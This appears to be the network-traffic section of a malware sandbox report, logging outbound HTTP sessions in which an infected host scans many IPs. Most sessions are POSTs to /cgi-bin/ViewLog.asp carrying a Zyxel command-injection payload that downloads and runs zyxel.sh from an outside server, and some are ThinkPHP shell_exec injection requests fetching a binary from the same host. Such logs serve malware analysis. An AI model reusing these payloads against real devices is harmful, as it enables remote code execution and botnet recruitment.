                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      429192.168.2.155280431.200.124.1448080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:52.688689947 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      430192.168.2.154729094.120.145.1118080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:52.688878059 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      431192.168.2.155470095.86.75.2298080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:52.697118044 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      432192.168.2.155928085.61.178.118080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:52.889579058 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:53.117610931 CET254INHTTP/1.0 302 Found
                                                      Server: httpd
                                                      Date: Wed, 14 Feb 2024 08:29:59 GMT
                                                      Location: index.htm
                                                      Pragma: no-cache
                                                      Cache-Control: no-cache,no-store,must-revalidate, post-check=0,pre-check=0
                                                      Expires: 0
                                                      CONTENT-LANGUAGE: en
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      433192.168.2.155727494.123.41.578080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:52.917318106 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      434192.168.2.153619031.200.93.1008080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:52.936582088 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      435192.168.2.155929885.61.178.118080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:53.323064089 CET290INHTTP/1.0 400 Bad Request
                                                      Server: httpd
                                                      Date: Wed, 14 Feb 2024 08:29:59 GMT
                                                      Content-Type: text/html
                                                      CONTENT-LANGUAGE: en
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      436192.168.2.1539986112.124.165.10880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:54.239906073 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:54.610196114 CET502INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:32:08 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      437192.168.2.153829831.136.82.1188080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:54.423353910 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:55.097393036 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:56.473413944 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:59.321289062 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:04.953083038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:15.960851908 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:39.256103039 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:24.310848951 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      438192.168.2.155395695.245.1.2238080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:54.437572002 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:54.714309931 CET498INHTTP/1.1 401 Unauthorized
                                                      WWW-Authenticate: Basic realm="Protected"
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4b 73 65 6e 69 61 20 4c 61 72 65 73 20 57 65 62 53 65 72 76 65 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 23 33 33 33 33 33 33 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 39 39 39 39 39 39 20 66 61 63 65 3d 22 56 65 72 64 61 6e 61 2c 47 65 6e 65 76 61 2c 73 61 6e 73 2d 73 65 72 69 66 22 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 70 3e 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3a 20 50 61 73 73 77 6f 72 64 20 72 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 62 72 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 62 72 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 43 6f 70 79 72 69 67 68 74 20 26 63 6f 70 79 3b 20 32 30 31 35 2d 32 30 31 36 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 73 65 6e 69 61 73 65 63 75 72 69 74 79 2e 63 6f 6d 2f 22 20 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 66 66 33 33 33 33 3e 20 4b 73 65 6e 69 61 20 53 65 63 75 72 69 74 79 20 3c 2f 66 6f 6e 74 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 66 6f 6e 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>Ksenia Lares WebServer</title></head><body bgcolor=#333333><font color=#999999 face="Verdana,Geneva,sans-serif"><div align="center"><p><h1>Unauthorized: Password required</h1><br></p></div><br><div align="center">Copyright &copy; 2015-2016 <a href="http://www.kseniasecurity.com/" ><font color=#ff3333> Ksenia Security </font></a></div></div></font></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      439192.168.2.155096094.123.38.1758080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:54.447371006 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      440192.168.2.153916895.101.181.5380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:54.450278044 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:54.660700083 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:29:54 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:54 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 35 62 35 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 34 26 23 34 36 3b 32 63 37 30 38 38 33 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;35b5655f&#46;1707899394&#46;2c70883e</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      441192.168.2.155124494.120.43.1178080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:54.450599909 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      442192.168.2.153636894.121.36.258080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:54.450951099 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      443192.168.2.154744095.82.223.1158080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:54.453404903 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:54.713033915 CET296INHTTP/1.1 200 OK
                                                      Content-Type: text/html; charset=utf-8
                                                      Date: Wed, 14 Feb 2024 08:29:54 GMT+00:00
                                                      Connection: Close
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 57 65 6c 63 6f 6d 65 20 74 6f 20 50 65 72 73 6f 6e 61 6c 20 53 65 72 76 65 72 3c 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 70 3e 74 6f 20 62 72 6f 77 73 65 20 66 69 6c 65 20 63 6c 69 63 6b 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 30 2e 31 34 3a 38 30 2f 64 69 72 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head></head><body><center><h1>Welcome to Personal Server<h1></center><p>to browse file click <a href="http://192.168.0.14:80/dir">here</a></p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      444192.168.2.154468295.179.171.1318080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:54.625058889 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
